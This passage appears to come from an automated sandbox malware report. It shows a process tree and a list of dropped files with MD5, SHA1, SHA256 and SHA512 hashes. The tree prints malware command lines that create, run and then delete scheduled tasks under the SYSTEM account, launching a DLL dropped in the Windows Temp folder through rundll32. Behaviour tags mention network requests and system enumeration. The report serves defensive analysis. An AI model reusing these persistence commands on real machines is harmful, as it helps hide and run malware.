C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\DSqYrZi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 06:58:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll\",#1 /FIsite_idzJb 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YGcJOiVocZfwUgdee"2⤵PID:32
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"2⤵PID:2776
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 3851181⤵PID:4940
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\ikuFnJEA\uKkhvGx.dll",#1 /FIsite_idzJb 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4948 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"3⤵PID:5116
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ac468f310e3b41f01c4f5b01b5eb6ebd
SHA146b754310373f471d3416007f93625a36ada51cc
SHA256fa0ba5ab1115cd219b12907d9d8371b76e6406ab592e2016a49e7006825531ef
SHA5121d255cf9da83ea0784af636b1872edd860d6de44df6a8c2e6731ea01d89a6b7dace6c939e2a73d0a0bbdfcec52f8aab95e4afb3805c12be60d90051ebfb2d848
-
Filesize
2KB
MD524d95524410ce69f7d00cbb177e7063a
SHA10e3f50d0460d2e080de165e6cebec882b0ba8c66
SHA2566ce6ff73a40b18b9a80b6f50f58737d2a086495f55f0e6be5c83975eea7a356b
SHA512395b66a348a61a329967c04ccc588b2aac1ff2e629d372ae95f2bcf405978c17aada726137a2fdc55f70f86c7fca89c6359474cc01c5bdee25ce0469d18669dd
-
Filesize
2KB
MD5ef079aaef1f906e42885bbc7d4d35de0
SHA172a4a1e024062fb94baf95a8a9369a21a7dd0ce6
SHA25673f9e05dcb26f2e9091df88bfefb24d6c3ca93d8c1ca25ed3c17e25c7191ecf3
SHA51231214f2d81c28e25030e19d355b13a004d82c4e9180b93c9775d268d5666f72591bc17f117c006f5632ebd713a107562c8df65feadc33084cf63db399c933b72
-
Filesize
2KB
MD57ced44a4597f84a3465330016b6ae6c2
SHA1f51191faa614fd36c966a581b57a184c9ccdeea7
SHA2568506fcdf097b836180c54c6b67d1433cd48d0dbb9fd231b0929408e85bbe935d
SHA512fa2c85423fd69d5c4e8fcacdfe8751d32cd1b147e3619272cbbf038584b8856a7fc5003503aeb4b74cffdbb1cd9cd4a794ea5b10ae077c8d8cf2f815921ce5c5
-
Filesize
2.5MB
MD568ec4c9163e8df51afda69a05eac9b8a
SHA18d9094bfaf0669d7d40f31a839c3844720bfcc88
SHA25633377d4dd62efc7a3bfb480d44b98008c9ffbe20cc102b70d9bf03e9028609c9
SHA5124d52b0a351a078f32b7ef3e19420f86bc1b835a9b45bff354cfc625c88792d21db7f8d0898ab66cefb5ca6bab47478da275d34cf851c14acb6453cdb6edce573
-
Filesize
2KB
MD5d188cd4730ba590320b50f713f226c15
SHA154ead28d533e6f83caf4e67803a6df5122765f39
SHA256b6a8fdea0faf9e3aee8d8b78bbdf72a32ca1487882337dffb1ca6998b04a2d12
SHA51295c0e266a39cbec9a76676ee39073f11a317f7cbac0725d47bed95ea05f26883e1aaed1159be1714eaae613264cfc3dd369702d42c216e7b41e43ee13158b6b4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD571766891f1f2e0fea4dec97395dd444d
SHA1a7e3c9f0721698f70b6287359c9ccbf646660435
SHA256a2489f5e8f06027cbe8b8bc2d4ac6cd422358a782718b2b119c130bd116558a3
SHA512f5a6c615c2b3046053a7cdb2a3ab02b8aa2af9839e4f922bfb8c8f66fa0abda6a3818a58e87d82ceeee3ef67c34673dcceb34409eb17980f2e0e0728f5c6918e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5f7e4d801190784fab27905b5a1e7647c
SHA158d89d1529c012611d697ad8bc7c89b118ec890f
SHA256985c2914e0ababa35f526951fdf1126f1a62151c230a2681a5bde10c395b0143
SHA512351ada10a303c11a9ca44bbd474d7991efc28bb5aa840153a2d6c435a5f6f45e1d1b762ab037919def8b3c39de358018a2df67b0ab171533afbe6590144d1c00
-
Filesize
11KB
MD5903c54d0f62b7011825a451f5a81ede3
SHA1066a02609a2f69af6cc2ec6e961392b6256c58cf
SHA256ec18b54a6c89301b21d9cdfefb1a563fea05c0c40764308647d65f79436d1c86
SHA51295ee65dd3d5df495cc7eb78cda883150138a38e0ec396c4a30e9659120301372ec4d2943eee5ce702d5a2c52f78e3368ccf51c671ab5bc472e2e4a82fe2004fb
-
Filesize
6.7MB
MD56248fde83e7929ff0561fd033b68d11c
SHA12ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA25666959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA51280bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b9d29e6b972000e5a0a8f23aa2b59474
SHA1c8fc5f29e2f3e0b24effe96e34725bbdb63205c7
SHA256ff995a3116e33ace0876cab389c16288acf9ae51e11c1951fabae69c9d4bb2a8
SHA5125d48e156462a397eaa3d510f4c7030b396ac3936066ed1f612be92231b1d831ff9e0bde04af741b55f5ac13d9c34fd072b260b9b53a9e981c2bf39dd275b4991
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5678449db0c19440d6e80f5b233fea5be
SHA157ac3f8e4db80d8980020252e8e412271c2157b6
SHA256a58e6cbd6749cf00d2bd5d8f82ac5c89d2c3534f2e75a5f80bbf88e159e4fd25
SHA5129d1864417c240930e65e2e00a84863e93681bb2e1dc0b65fa4e57d79c8c5906d7eb46e62e5b9d2b51046a69f56e31703c0ad9e9c6a0fc958df945ff7041d7baa
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD58a6c3c61bbc81c19401654951e4ebed6
SHA1d5dfe9c03d1c0dd76daa9fad7f78be758390700f
SHA256ec4af60b0419302df816d665908de228c45716605d19065e0bd9471cb8b710d9
SHA5128bd3ec9ebe2921eb01204d2bcb67da8c050519a3e19ffb1f23482570df3aae55cbe1a79938582f9d4edd4e63647571e0c19b0d99a7538f97a1002e14f22e65ad
-
Filesize
6.4MB
MD5db0e0228f220bd8fa3b45a0043744456
SHA1e287442ab5c21cab796c6893a34f0474820b6515
SHA2569d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763
-
Filesize
6KB
MD52eed991e6e31d306e68ef64d773d3e16
SHA127b5035255d679a7015d1a2e5bfcc5f124160689
SHA2563b839645035f3ad69591e7e9db4967a695877782e57703ee61d64eeb11be7fa1
SHA512d124006d52504010a7dd99599e58b026c28febe793e77609b6151152a7d3765cc52f3fec504680f7d9b08e183d3190858580c7035f9d95990292241535d40404